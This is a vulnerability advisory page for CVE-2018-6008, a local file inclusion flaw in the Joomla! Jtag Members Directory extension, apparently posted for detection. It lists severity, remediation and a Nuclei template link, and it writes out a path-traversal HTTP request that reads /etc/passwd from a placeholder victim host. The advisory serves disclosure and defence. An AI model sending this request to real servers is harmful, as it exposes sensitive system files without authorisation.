🔙 목록으로 돌아가기

CVE-2018-6008: Joomla! Jtag Members Directory 5.3.7 - Local File Inclusion

TitleJoomla! Jtag Members Directory 5.3.7 - Local File Inclusion
Authordaffainfo
SeverityHigh
ImpactSuccessful exploitation of this vulnerability can result in unauthorized access to sensitive files on the server, potentially leading to further compromise of the system.
RemediationUpdate Joomla! Jtag Members Directory to the latest version or apply the patch provided by the vendor to mitigate the LFI vulnerability.
CVSS Score7.5
EPSS Score0.75568
CVE IDCVE-2018-6008
CWE IDCWE-200
Tags cve2018 cve joomla lfi edb packetstorm joomlatag joomla\! vuln

🔍 Vulnerability Description

Joomla! Jtag Members Directory 5.3.7 is vulnerable to local file inclusion via the download_file parameter.

🌐 HTTP Request

GET /index.php?option=com_jtagmembersdirectory&task=attachment&download_file=../../../../../../../../../../../etc/passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:1.9.5.20) Gecko/ Firefox/3.6.12
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2018/CVE-2018-6008.yaml

🦈 Packet Capture: ⬇️ Download cve-2018-6008.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A